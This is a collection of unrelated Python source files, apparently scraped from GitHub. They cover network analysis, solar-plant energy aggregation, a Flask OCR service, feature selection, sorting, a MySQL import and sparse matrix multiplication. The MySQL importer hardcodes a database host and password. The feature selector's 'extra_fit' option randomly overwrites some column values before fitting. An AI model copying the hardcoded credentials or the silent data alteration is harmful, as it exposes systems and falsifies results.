nx.DiGraph()\ncnt = 0\nonly_users = []\nonly_claims = []\nfor node in NH:\n if node > 1000 and node < 1000000:\n cnt = cnt + 1\n only_claims.append(node)\n elif node > 1000000:\n only_users.append(node) # users\n\n# print(\"articles\", cnt)\n# print(only_users)\n# print(only_claims)\n\nDG.add_nodes_from(only_users)\n\nfor l in only_claims:\n claims_out = list(NH.successors(l))\n claims_in = list(NH.predecessors(l))\n # print(\"for \",l , claims_out,claims_in)\n for x in claims_in:\n for y in claims_out:\n DG.add_edge(x, y)\n\n# nx.draw(DG, with_labels=False)\n# plt.show()\nprint(\"####################3\")\nprint(\"nodes:\", len(list(DG.nodes)), \"edges:\", len(list(DG.edges)))\n# print(\"diameter\",nx.diameter(DG.to_undirected()))\n# print(\"average\", nx.average_shortest_path_length(DG))\n\n# remove = [node for node, degree in dict(DG.degree()).items() if degree == 1084]\n# DG.remove_nodes_from(remove)\n# # remove = [node for node, degree in dict(DG.degree()).items() if degree > 400]\n# # DG.remove_nodes_from(remove)\n# remove = [node for node, degree in dict(DG.degree()).items() if degree == 125]\n# DG.remove_nodes_from(remove)\n# remove = [node for node, degree in dict(DG.degree()).items() if 100 > degree > 10]\n# DG.remove_nodes_from(remove)\n# # nx.draw(DG, with_labels=False)\n# # plt.show()\n# print(\"nodes:\", len(list(DG.nodes)), \"edges:\", len(list(DG.edges)))\n\n\n\n\n# התפלגות דרגות\ndegree_sequence = DG.in_degree()\nprint(degree_sequence)\ndegree_sequence = sorted([d for n, d in DG.in_degree()], reverse=True) # degree sequence\nprint(\"degree\", degree_sequence)\ndegreeCount = collections.Counter(degree_sequence)\ndeg, cnt = zip(*degreeCount.items())\n# print(\"deg\",deg)\n# # p = []\n# # for x in cnt:\n# # p.append(x / len(nodes))\nprint(\"cnt\", cnt)\n# # print(\"probabily\", p)\nfig, ax = plt.subplots()\nplt.bar(deg, cnt, width=1, color=\"b\")\nplt.title(\"Degree Histogram\")\nplt.ylabel(\"count\")\nplt.xlabel(\"Degree\")\nplt.xscale('log')\nplt.yscale('log')\nplt.show()\n\n#התפלגות עם נרמול של העמודות\nplt.hist(deg, bins=np.logspace(np.log10(1), np.log10(1000), 50), density=True, stacked=True, edgecolor='black')\nplt.gca().set_xscale(\"log\")\nplt.gca().set_yscale(\"log\")\nplt.show()\nx=np.array(deg)\ny=np.array(cnt)\n\n#Applying a linear fit with .polyfit()\nfit = np.polyfit(x,y,1)\nang_coeff = fit[0]\nintercept = fit[1]\nprint(fit)\nfit_eq = ang_coeff*x + intercept #obtaining the y axis values for the fitting function\nprint(fit_eq)\n#Plotting the data\nfig = plt.figure()\nax = fig.subplots()\nax.plot(x, fit_eq,color = 'r', alpha = 0.5, label = 'Linear fit')\nax.scatter(x,y,s = 5, color = 'b', label = 'Data points') #Original data points\nax.set_title('Linear fit ')\nax.legend()\n# plt.xscale('log')\n# plt.yscale('log')\nplt.show()\n\n\n\n# betweenness=nx.betweenness_centrality(DG, k=None, normalized=True, weight=None, endpoints=False, seed=None)\n# print(betweenness)\n# node_sizes=[]\n# for x in betweenness.values():\n# node_sizes.append(x*1000)\n# nx.draw(DG, node_color=color_map,node_size=node_sizes, with_labels=False)\n# plt.show()\n# print(sorted([d for n, d in DG.out_degree()], reverse=True))\npage_rank = nx.pagerank(DG, alpha=0.8)\na = dict(sorted(page_rank.items(), reverse=True, key=lambda item: item[1]))\nprint(\"page rank\", a)\n\ncloseness = nx.closeness_centrality(DG)\na = dict(sorted(closeness.items(), reverse=True, key=lambda item: item[1]))\nprint(\"closeness\", a)\n# key=list(a.keys())\n# value=list(a.values())\n# fig, ax = plt.subplots()\n# # ax.fmt_ydata = millions\n# plt.plot(key, value, 'o')\n# plt.show()\n\n# configuration\n# degrees = []\n# degree_list = DG.degree(original_nodes)\n# for d in degree_list:\n# degrees.append(d[1])\n# print(degrees)\n# CM = nx.configuration_model(degrees, create_using=None, seed=None)\n# nx.draw(CM, with_labels=False)\n# plt.show()\n# print(\"nodes:\", len(list(CM.nodes)))\n# print(\"edges:\", len(list(CM.edges)))\n\n# erdos\n# ERG = nx.erdos_renyi_graph(len(list(DG.nodes)), 0.0385, seed=None, directed=False)\n# # nx.draw(ERG, with_labels=False)\n# # plt.show()\n# print(\"nodes:\", len(list(ERG.nodes)))\n# print(\"edges:\", len(list(ERG.edges)))\n\nclustering = nx.clustering(DG, nodes=None, weight=None)\na = dict(sorted(clustering.items(), reverse=True, key=lambda item: item[1]))\nprint(\"clustering\", a)\n\nprint(nx.transitivity(DG))\n","repo_name":"Hila97/socialNetworks","sub_path":"real_claim.py","file_name":"real_claim.py","file_ext":"py","file_size_in_byte":9594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24883326147","text":"from __future__ import absolute_import\nfrom celery import shared_task\nimport logging\nimport traceback\nimport sys\nfrom django.conf import settings\nfrom django.db import connections\nimport datetime\nfrom dataglen.models import Sensor\nfrom isoweek import Week\nfrom solarrms.models import IndependentInverter, SolarPlant, PlantMetaSource\nfrom dataglen.models import ValidDataStorageByStream\nfrom solarrms.settings import INVERTER_VALID_LAST_ENTRY_MINUTES, INVERTER_POWER_FIELD, \\\n PLANT_POWER_STREAM, PLANT_ENERGY_STREAM, INVERTER_ENERGY_FIELD\n# DO NOT CHANGE THIS IMPORT!\nfrom kutbill.worker import *\nfrom monitoring.views import write_a_data_write_ttl\nfrom datetime import timedelta\nimport pytz\n\n\n# get a logger\nlogger = logging.getLogger('logger.tasks')\nlogger.setLevel(logging.DEBUG)\n\ndef write_logging_errors(func_name):\n logger.debug(\"%s,%s,%s\",\n func_name, traceback.format_exc(),\n repr(traceback.extract_stack()))\n\n\ndef compare_dates(offset_naive_dt, offset_aware_dt):\n return offset_naive_dt.replace(tzinfo=pytz.UTC, microsecond=0) == offset_aware_dt.astimezone(pytz.UTC).replace(microsecond=0)\n\ndef write_plant_energy(user_id, plant_metakey, ts, n_writes):\n #logger.debug(\",\".join([str(user_id), str(plant_metakey), str(ts), str(n_writes)]))\n unit_conversion = 1.0\n try:\n plant_meta = PlantMetaSource.objects.get(sourceKey=plant_metakey)\n #logger.debug(plant_meta)\n plant_slug = plant_meta.plant.slug\n #logger.debug(plant_slug)\n # DO THE POWER CALCULATIONS\n if plant_meta.sending_aggregated_power:\n unit = plant_meta.fields.filter(name=PLANT_POWER_STREAM)[0].streamDataUnit\n #logger.debug(unit)\n if unit:\n if unit.upper() == \"W\":\n unit_conversion = 1000.0\n elif unit.upper() == \"KW\":\n unit_conversion = 1.0\n else:\n unit_conversion = 1.0\n #logger.debug(\"power unit:\" + str(unit_conversion))\n try:\n power_value = ValidDataStorageByStream.objects.filter(source_key=plant_meta.sourceKey,\n stream_name=PLANT_POWER_STREAM,\n timestamp_in_data=ts)\n # assert that the last data write is same as this ts\n power_value = float(power_value[0].stream_value)/float(unit_conversion)\n except:\n return 0\n #logger.debug(power_value)\n # WRITE THE VALUES\n update_power(plant_slug, ts, power_value)\n #logger.debug(\"power_updated\")\n\n if plant_meta.sending_aggregated_energy:\n # DO THE ENERGY CALCULATIONS\n unit = plant_meta.fields.filter(name=PLANT_ENERGY_STREAM)[0].streamDataUnit\n if unit:\n if unit.upper() == \"WH\":\n unit_conversion = 1000.0\n elif unit.upper() == \"KWH\":\n unit_conversion = 1.0\n else:\n unit_conversion = 1.0\n\n #logger.debug(\"energy unit: \" + str(unit_conversion))\n try:\n energy_values = ValidDataStorageByStream.objects.filter(source_key=plant_meta.sourceKey,\n stream_name=PLANT_ENERGY_STREAM,\n timestamp_in_data__lte=ts).limit(2)\n # assert that the first timestamp is same as this data write\n assert(compare_dates(energy_values[0].timestamp_in_data,ts))\n # if the values are next to each other\n if energy_values[0].timestamp_in_data - energy_values[1].timestamp_in_data < datetime.timedelta(minutes=INVERTER_VALID_LAST_ENTRY_MINUTES):\n # since it's cumulative, it should be positive\n if (float(energy_values[0].stream_value) - float(energy_values[1].stream_value)) > 0:\n energy_value = float(float(energy_values[0].stream_value) - float(energy_values[1].stream_value))/float(unit_conversion)\n energy_today = float(energy_values[0].stream_value)\n else:\n return 0\n else:\n return 0\n except:\n return 0\n #logger.debug(energy_value)\n update_energy(str(user_id) + \"_\" + str(plant_slug), ts, energy_value, energy_today)\n #logger.debug(\"energy_updated\")\n except Sensor.DoesNotExist:\n return 0\n\ndef write_inverter_energy(user_id, source_key, ts, n_writes):\n logger.debug(\",\".join([str(user_id), str(source_key), str(ts), str(n_writes), \"write_inverter_energy\"]))\n unit_conversion = 1.0\n try:\n inverter = IndependentInverter.objects.get(sourceKey=source_key)\n try:\n if hasattr(inverter.plant, 'gateway'):\n if inverter.plant.gateway.isVirtual:\n write_a_data_write_ttl(inverter.plant.owner.organization_user.user_id,\n inverter.plant.gateway.sourceKey,\n inverter.plant.gateway.timeoutInterval,\n True,\n timezone.now())\n except Exception as exc:\n logger.debug(exc)\n pass\n plant_slug = inverter.plant.slug\n unit = inverter.fields.filter(name=INVERTER_POWER_FIELD)[0].streamDataUnit\n if unit:\n if unit.upper() == \"W\":\n unit_conversion = 1000.0\n elif unit.upper() == \"KW\":\n unit_conversion = 1.0\n else:\n unit_conversion = 1.0\n except IndependentInverter.DoesNotExist:\n return 0\n\n try:\n #raise ValidDataStorageByStream.DoesNotExist\n daily_yield = ValidDataStorageByStream.objects.filter(source_key=source_key,\n stream_name=INVERTER_ENERGY_FIELD,\n timestamp_in_data__lte=ts).limit(2)\n if len(daily_yield) == 0:\n # it's a dumb inverter\n logger.debug(\"daily_yield == 0 no such data\")\n raise ValidDataStorageByStream.DoesNotExist\n\n if len(daily_yield) >= 1:\n # update the power in all cases if there's no cluster controller\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_power is False:\n logger.debug(\"writing power for this inverter\")\n # update power values for this inverter, nothing can be done for energy yet\n write_entries = ValidDataStorageByStream.objects.filter(source_key=source_key,\n stream_name=INVERTER_POWER_FIELD,\n timestamp_in_data=ts).values_list('timestamp_in_data', 'stream_value')\n if len(write_entries) == 0:\n logger.debug(\"write_entries==0\")\n elif n_writes == 1:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n elif n_writes > 1:\n logger.debug(\"this should not be happening since we are not sending aggregated data yet\")\n\n # assert that the first timestamp in the data is same as of this data write\n assert(compare_dates(daily_yield[0].timestamp_in_data, ts))\n if len(daily_yield) == 2:\n # update energy if the data records are greater than 1 (i.e. the energy can be calculated)\n # and there is no cluster controller\n # it's an intelligent inverter\n if daily_yield[0].timestamp_in_data - daily_yield[1].timestamp_in_data > \\\n datetime.timedelta(minutes=INVERTER_VALID_LAST_ENTRY_MINUTES):\n return 0\n\n #logger.debug(\"intelligent inverter\")\n if float(daily_yield[1].stream_value) > 100000 or float(daily_yield[0].stream_value) > 100000:\n # TODO relate it to the plant capacity\n #logger.debug(\"abnormal value\")\n return 0\n #logger.debug(float(daily_yield[0].stream_value))\n #logger.debug(float(daily_yield[1].stream_value))\n\n energy = float(float(daily_yield[0].stream_value) - float(daily_yield[1].stream_value))\n if energy < 0 :\n #logger.debug(\"day change?\")\n return 0\n # update it for both plant and inverter\n energy_unit = inverter.fields.filter(name=INVERTER_ENERGY_FIELD)[0].streamDataUnit\n energy_unit_conversion = 1.0\n if energy_unit:\n if energy_unit.upper() == \"WH\":\n energy_unit_conversion = 1000.0\n elif energy_unit.upper() == \"KWH\":\n energy_unit_conversion = 1.0\n # update for the inverter in any case\n update_energy(inverter.sourceKey, ts, energy/energy_unit_conversion, float(daily_yield[1].stream_value))\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_energy is False:\n # update for teh plant also\n update_energy(str(user_id) + \"_\" + str(inverter.plant.slug), ts, energy/energy_unit_conversion)\n except Exception as exc:\n #logger.debug(str(exc))\n # there's no daily_yield data, dumb inverter\n #\n # DUMB INVERTER - not sending cumulative energy values\n #logger.debug(\"it's a dumb inverter\")\n try:\n # get all the active power values >= ts and limit by n_writes [essentially the data point at ts]\n write_entries = ValidDataStorageByStream.objects.filter(source_key=source_key,\n stream_name=INVERTER_POWER_FIELD,\n timestamp_in_data=ts).values_list('timestamp_in_data', 'stream_value')\n\n if len(write_entries) == 0:\n #logger.debug(\",\".join([\"returning\", str(len(write_entries))]))\n # nothing to be done, this should not be happening though\n return 0\n\n #logger.debug(\",\".join([\"write_entries\", str(len(write_entries))]))\n # get a value just before the first value in the array, to calculate energy\n last_entry = ValidDataStorageByStream.objects.filter(source_key=source_key,\n stream_name=INVERTER_POWER_FIELD,\n timestamp_in_data__lt=ts).limit(1).values_list('timestamp_in_data', 'stream_value')\n final_entries = []\n if len(last_entry) == 0:\n #logger.debug(\"last_entry==0\")\n if n_writes > 1:\n pass\n elif n_writes == 1:\n # there's no last valid entry\n # if we've received only a single write, return now\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_power is False:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n return 0\n else:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n return 0\n else:\n final_entries.append(last_entry[0])\n\n #logger.debug(len(write_entries))\n for entry in write_entries:\n final_entries.append(entry)\n\n #logger.debug(len(final_entries))\n for i in range(0, len(final_entries) - 1):\n if final_entries[i+1][0] - final_entries[i][0] > datetime.timedelta(minutes=INVERTER_VALID_LAST_ENTRY_MINUTES):\n continue\n else:\n if float(final_entries[i+1][1]) < 0 or float(final_entries[i][1]) < 0:\n continue\n energy_mean = (float(final_entries[i+1][1]) + float(final_entries[i][1]))/(float(2)*unit_conversion)\n delta = final_entries[i+1][0] - final_entries[i][0]\n total_seconds = delta.total_seconds()\n energy = (energy_mean * total_seconds)/float(3600)\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_energy is False:\n update_energy(inverter.sourceKey, ts, energy)\n update_energy(str(user_id) + \"_\" + str(inverter.plant.slug), ts, energy)\n else:\n update_energy(inverter.sourceKey, ts, energy)\n else:\n update_energy(inverter.sourceKey, ts, energy)\n update_energy(str(user_id) + \"_\" + str(inverter.plant.slug), ts, energy)\n\n # skip the first entry as that's an old value - we needed that for the computation of energy\n # but that should not be added again as power\n #logger.debug(\"updating power values\")\n for i in range(1, len(final_entries)):\n if hasattr(inverter.plant, 'metadata'):\n if inverter.plant.metadata.sending_aggregated_power is False:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n else:\n update_power(plant_slug, ts, float(write_entries[0][1])/float(unit_conversion))\n except Exception as exc:\n return 0\n\n@shared_task\ndef update_power(plant_slug, ts, power):\n #logger.debug(\",\".join([plant_slug, str(ts), str(power), \"update_power\"]))\n if power < 0:\n return\n try:\n timestamp = ts.replace(second=0, microsecond=0)\n session = connections['cassandra'].connection.session\n\n if session:\n get_power_statement = session.prepare(\"SELECT power from dataglen_data.plant_power_table WHERE plant_slug = ? AND ts = ?\")\n update_power_statement = session.prepare(\"UPDATE dataglen_data.plant_power_table SET power = ? WHERE plant_slug = ? AND ts = ?\")\n\n existing_power = session.execute(get_power_statement, [plant_slug,\n timestamp])\n\n if existing_power:\n existing_power_value = float(existing_power[0]['power'])\n updated_power = float(existing_power_value) + float(power)\n session.execute(update_power_statement, [updated_power,\n plant_slug,\n timestamp])\n else:\n session.execute(update_power_statement, [power,\n plant_slug,\n timestamp])\n return 0\n else:\n #logger.debug(\"Unable to get a new cassandra session in update power\")\n return 1\n except Exception as exc:\n #logger.debug(exc)\n write_logging_errors(sys._getframe().f_code.co_name)\n return 1\n\n@shared_task\ndef update_energy(identifier, ts, energy, energy_today=None):\n try:\n #logger.debug(\"starting timestamps-1\")\n if energy_today:\n logger.debug(\",\".join([identifier, str(ts), str(energy), str(energy_today), \"update_energy\"]))\n else:\n logger.debug(\",\".join([identifier, str(ts), str(energy), \"update_energy\"]))\n #logger.debug(\"starting timestamps0\")\n identifiers = [identifier]\n #logger.debug(\"starting timestamps1\")\n # let's use the monday of the week as the timestamp for weeks\n week_details = ts.isocalendar()\n #logger.debug(\"starting timestamps2\")\n week = Week(week_details[0], week_details[1])\n #logger.debug(\"starting timestamps3\")\n week_monday_date = week.monday()\n #logger.debug(\"starting timestamps4\")\n timestamps = [(settings.DATA_COUNT_PERIODS.FIVE_MINTUES, ts.replace(minute=ts.minute - ts.minute%5, second=0, microsecond=0)),\n (settings.DATA_COUNT_PERIODS.HOUR, ts.replace(minute=0, second=0, microsecond=0)),\n (settings.DATA_COUNT_PERIODS.DAILY, ts.replace(hour=0, minute=0, second=0, microsecond=0)),\n (settings.DATA_COUNT_PERIODS.WEEK, ts.replace(month=week_monday_date.month,\n day=week_monday_date.day, hour=0, minute=0,\n second=0, microsecond=0)),\n (settings.DATA_COUNT_PERIODS.MONTH, ts.replace(day=1, hour=0,\n minute=0, second=0, microsecond=0))]\n session = connections['cassandra'].connection.session\n\n if session:\n get_energy_statement = session.prepare(\"SELECT energy from dataglen_data.energy_generation_table WHERE timestamp_type = ? AND count_time_period = ? AND identifier = ? AND ts = ?\")\n update_energy_statement = session.prepare(\"UPDATE dataglen_data.energy_generation_table SET energy = ? WHERE timestamp_type = ? AND count_time_period = ? AND identifier = ? AND ts = ?\")\n #logger.debug(\"Statements prepared5\")\n for identifier in identifiers:\n for entry in timestamps:\n #logger.debug(identifier)\n #logger.debug(entry[0])\n #logger.debug(entry[1])\n existing_energy = session.execute(get_energy_statement, [settings.TIMESTAMP_TYPES.BASED_ON_REQUEST_ARRIVAL,\n entry[0],\n identifier,\n entry[1]])\n\n if existing_energy:\n existing_energy_value = float(existing_energy[0]['energy'])\n updated_energy = existing_energy_value + energy\n\n # if it's a daily energy log, check if we missed any points\n if energy_today and entry[0] == settings.DATA_COUNT_PERIODS.DAILY:\n if updated_energy != energy_today:\n updated_energy = energy_today\n\n\n # TODO fix the week values, we will probably need am offline job for that\n\n session.execute(update_energy_statement, [updated_energy,\n settings.TIMESTAMP_TYPES.BASED_ON_REQUEST_ARRIVAL,\n entry[0],\n identifier,\n entry[1]])\n else:\n session.execute(update_energy_statement, [energy,\n settings.TIMESTAMP_TYPES.BASED_ON_REQUEST_ARRIVAL,\n entry[0],\n identifier,\n entry[1]])\n return 0\n else:\n logger.debug(\"Unable to get a new cassandra session\")\n return 1\n except:\n write_logging_errors(sys._getframe().f_code.co_name)\n return 1","repo_name":"gokul-cloudside/kutbull-original-backup","sub_path":"solarrms/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":20243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"42138993063","text":"# Flask\nfrom flask import Flask, request, render_template, jsonify\n\n# Some utilites\nimport numpy as np\nimport cv2\nfrom helper.util import base64_to_pil, draw, np_to_base64, read_url_img\n\n# Declare a flask app\napp = Flask(__name__)\n\n# Models\nfrom dnn.main import text_ocr\n\nTEXT_LINE_SCORE=0.7## min prob thres for text line detection\nscale = 900##no care text.cfg height,width\nmaxScale = 1800\n\n@app.route('/', methods=['GET'])\ndef index():\n # Main page\n\n return render_template('index.html')\n \n@app.route('/predict', methods=['GET', 'POST'])\ndef predict():\n if request.method == 'POST':\n # Get the image/image_url from post request\n try:\n img = base64_to_pil(request.json)\n except:\n img = read_url_img(request.json)\n\n image = np.array(img)\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n data,boxes = text_ocr(image,scale,maxScale,TEXT_LINE_SCORE)\n res_image = draw(boxes,img) \n return jsonify(result=data, image=np_to_base64(np.array(res_image)))\n return None\n\nif __name__ == '__main__':\n # FOR LOCAL RUN DEPLOY\n # app.run(port=3000, debug=True)\n \n # FOR LOCAL RUN DOCKER\n app.run(host='0.0.0.0',port=5002, debug=False)\n \n # FOR DEPLOYMENT DOCKER\n # import os\n # port = int(os.environ.get('PORT', 5000))\n # app.run(host = '0.0.0.0', port = port)\n\n","repo_name":"suinaowawa/chinese-ocr-flask-deploy","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"29690111360","text":"import constants\nfrom sklearn import decomposition\nfrom random import uniform, randrange\nimport re\nimport numpy as np\n\n\nclass FeatureSelect:\n def __init__(self, data, extra_fit=False):\n self.data = data\n self.matrix = data.as_matrix(x for x in data.columns if x not in constants.COLUMN_THRESHOLD)\n self.components = self.matrix\n self.features = None\n self.extra_fit = extra_fit\n\n def pca(self, no_components=2):\n self.features = decomposition.PCA(n_components=no_components)\n self.fit()\n\n def lda(self, no_topics=2):\n self.features = decomposition.LatentDirichletAllocation(n_topics=no_topics, learning_method='batch')\n self.fit()\n\n def ica(self):\n self.features = decomposition.FastICA()\n self.fit()\n\n def fit(self):\n if self.extra_fit:\n col = self.data.as_matrix(x for x in self.data.columns if x in constants.COLUMN_THRESHOLD and re.match(\"^[S-U].*\", x))\n for arr in col:\n if uniform(0, 1) > 0.81:\n arr[0] = randrange(1, 6)\n self.components = np.c_[self.features.fit(self.matrix).transform(self.matrix), col]\n else:\n self.components = self.features.fit(self.matrix).transform(self.matrix)\n","repo_name":"alexdevmotion/eeg-image-classifier","sub_path":"classes/featureselect.py","file_name":"featureselect.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43644516036","text":"def heap_sort (vetor):\n tamanho = len(vetor)\n montar_heap(vetor,tamanho)\n while tamanho > 1:\n vetor[0],vetor[tamanho-1] = vetor[tamanho-1],vetor[0]\n tamanho -= 1\n max_heapify(vetor,0,tamanho)\n \ndef max_heapify (vetor,raiz,tam):\n maior = raiz\n\n esq = 2*raiz+1\n if esq < tam and vetor[esq] > vetor[maior]:\n maior = esq\n\n dir =2*raiz+2\n if dir < tam and vetor[dir] > vetor[maior]:\n maior = dir\n \n if maior != raiz:\n vetor[raiz],vetor[maior] = vetor[maior],vetor[raiz]\n max_heapify(vetor,maior,tam)\n \n\ndef montar_heap(vetor,tam):\n last = int((tam/2)-1)\n for i in range(last,-1,-1):\n max_heapify(vetor,i,tam) \n\n\nentrada = eval(input())\n\nwhile entrada != []:\n\n heap_sort(entrada)\n print(entrada)\n\n entrada = eval(input())","repo_name":"NinjaCompacto/Exercicios-de-Algoritmo-e-Estrutura-de-Dados-2","sub_path":"Ordenação/Heap Sort/Heap_Sort.py","file_name":"Heap_Sort.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"2434947971","text":"import MySQLdb\nimport csv\nimport collections\n\nPATH = \"/Users/gaoyounan/Desktop/Summer Term/Data Management/a1/CSV files/\"\ndb = MySQLdb.connect(\"35.183.6.252\", \"myuser\", \"mypass\", \"busDB\", charset='utf8' )\ncursor = db.cursor()\nfiles=open(PATH+'trips.csv','rb')\nReader = csv.DictReader(files)\n\nli = []\nt = 0\nfor row in Reader:\n t = t+1\n #row = collections.OrderedDict(originalRow)\n row['bus_num'] = row['route_id'].split('-')[0]\n str_arr = row['trip_id'].split('-')\n row['day'] = str_arr[len(str_arr)-2]\n row['sequence'] = str_arr[len(str_arr) - 1]\n row['trip_identification'] = int(str_arr[0])\n\n qmarks = ', '.join(['%s'] * len(row))\n\n cols = ', '.join(row.keys())\n sql = \"INSERT INTO %s (%s) VALUES (%s)\" % ('trips', cols, qmarks)\n\n li.append(row.values())\n if t % 1000 == 0:\n cursor.executemany(sql, li)\n db.commit()\n li = []\n\nif len(li) != 0:\n cursor.executemany(sql, li)\n db.commit()\n\n\nfiles.close()\ndb.close()","repo_name":"gaoyounan123/DB_Assignment1","sub_path":"Import Data into MySQL/Trip.py","file_name":"Trip.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"41942278652","text":"#https://www.hackerrank.com/challenges/most-commons/problem\n\n# !/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\nif __name__ == '__main__':\n s = input()\n\n result = dict()\n for c in s:\n if c not in result:\n result[c] = 1\n else:\n result[c] += 1\n\n count = 3\n for val in sorted(set(result.values()), reverse=True):\n subresult = {k: v for k, v in result.items() if v == val}\n subresult = dict(sorted(subresult.items()))\n for k1, v1 in subresult.items():\n count -= 1\n if count <= -1:\n break\n print(k1, v1)\n","repo_name":"KrishnaRaam-HackerRank/Python","sub_path":"7.collections/company_logo.py","file_name":"company_logo.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"31605474921","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\n\r\n#Ellpack format\r\nA = np.array([[1,0,0,0,0],[0,0,2,0,3],[0,4,0,0,5],[0,0,6,0,0],[0,0,0,7,0],[0,0,0,0,8]])\r\nB = np.array([[1],[2],[3],[4],[5]])\r\n\r\ndef ellpack(matrix1, matrix2):\r\n rowNum = int(matrix1.shape[0])\r\n columnNum = int(matrix1.shape[1])\r\n count = np.array([], dtype = int)\r\n r = 0\r\n\r\n for i in range(rowNum):\r\n count = np.append(count, 0)\r\n for j in range(columnNum):\r\n if matrix1[i][j] != 0:\r\n count[i] += 1\r\n count = max(count)\r\n\r\n\r\n NonZerosEntries = [[0 for i in range(count)] for j in range(rowNum)]\r\n Column = [[-1 for i in range(count)] for j in range(rowNum)]\r\n Result = np.array([], dtype = int)\r\n\r\n\r\n for i in range(rowNum):\r\n c = 0\r\n for j in range(columnNum):\r\n if matrix1[i][j] != 0:\r\n NonZerosEntries[r][c] = matrix1[i][j]\r\n Column[r][c] = j\r\n c += 1\r\n r += 1\r\n\r\n\r\n #Ellpack kernel\r\n\r\n for i in range(rowNum):\r\n temp = 0\r\n for j in range(count):\r\n if Column[i][j] == -1:\r\n break\r\n else:\r\n temp += NonZerosEntries[i][j] * matrix2[Column[i][j]]\r\n Result = np.append(Result, temp)\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ellpack(A,B)\r\n print (\"Ellpack result is: \", Result)\r\n","repo_name":"zhengdianchuaichuai/SpMV","sub_path":"ellpack.py","file_name":"ellpack.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"40439303020","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 14:44:09 2019\n\n@author: mckaydjensen\n\"\"\"\n\nimport json\nimport os\nimport numpy as np\nimport pandas as pd\n\nFEATURES_LOC = 'twitter_data/features'\n\ndef main():\n states_dict = {}\n filenames = os.listdir(FEATURES_LOC)\n for f in filenames:\n print('Extracting predictions from \"{}\"...'.format(f))\n with open(FEATURES_LOC + '/' + f, 'r', encoding='utf-8') as fh:\n features = json.load(fh)\n for tweet in features:\n place = tweet['place']\n score = tweet['prediction']\n try:\n states_dict[place].append(score)\n except KeyError:\n states_dict[place] = [score]\n states = states_dict.keys()[0]\n means = [np.mean(states_dict[state]) for state in states]\n stdevs = [np.std(states_dict[state], ddof=1) for state in states]\n df = pd.DataFrame({'state': states, 'mean': means, 'stdev': stdevs})\n df.to_csv('datadatadatadata.csv')\n return df","repo_name":"quevivasbien/twitter-sexism","sub_path":"compile_probabilities.py","file_name":"compile_probabilities.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"14546057132","text":"import PySimpleGUI as sg\nimport comportement\n\ntest = comportement.moveAnt()\n\nlayout = [[sg.Text(\"Valeur de x : \"+ str(test.x) +\" . Et valeur de y : \"+ str(test.y))], [sg.Button(\"Close window\")]]\n\nwindow = sg.Window(\"test\", layout, margins=(300,150))\n\nwhile True:\n event, values = window.read()\n if event == \"Close window\" or event == sg.WIN_CLOSED:\n break\n\nwindow.close()","repo_name":"Alexandre-stoppini/fourmis","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74712525494","text":"import bz2\nimport csv\nimport io\nimport json\n\n\ndef create_full_iterator(data):\n if isinstance(data, (list, tuple)):\n return identity_iterator\n\n if hasattr(data, 'name'):\n filename = data.name\n elif isinstance(data, bz2.BZ2File):\n filename = data._fp.name\n else:\n raise ValueError('This format is not supported')\n\n filename_parts = filename.split('.')\n if len(filename_parts) < 2:\n return jsonlines_file_iterator\n if 'jsonlines' in filename_parts[-2:]:\n return jsonlines_file_iterator\n if filename_parts[-1] == 'csv':\n return csv_file_iterator\n\n\ndef _move_pointer_to_start(data):\n try:\n file_types = (file, io.IOBase, bz2.BZ2File)\n except NameError:\n file_types = (io.IOBase, bz2.BZ2File,)\n if isinstance(data, file_types):\n data.seek(0, 0)\n\n\ndef jsonlines_file_iterator(data):\n decoder = json.JSONDecoder()\n _move_pointer_to_start(data)\n\n for obj in data:\n if isinstance(obj, bytes):\n obj = obj.decode('utf-8')\n obj = decoder.decode(obj)\n yield obj\n\ndef csv_file_iterator(data):\n _move_pointer_to_start(data)\n reader = csv.DictReader(data)\n for obj in reader:\n yield obj\n\ndef identity_iterator(data):\n for obj in data:\n yield obj\n","repo_name":"bashalex/datapot","sub_path":"datapot/iterators.py","file_name":"iterators.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"22"} +{"seq_id":"74544346295","text":"def celsius(valor):\n valor1=(valor*9/5)+32\n return 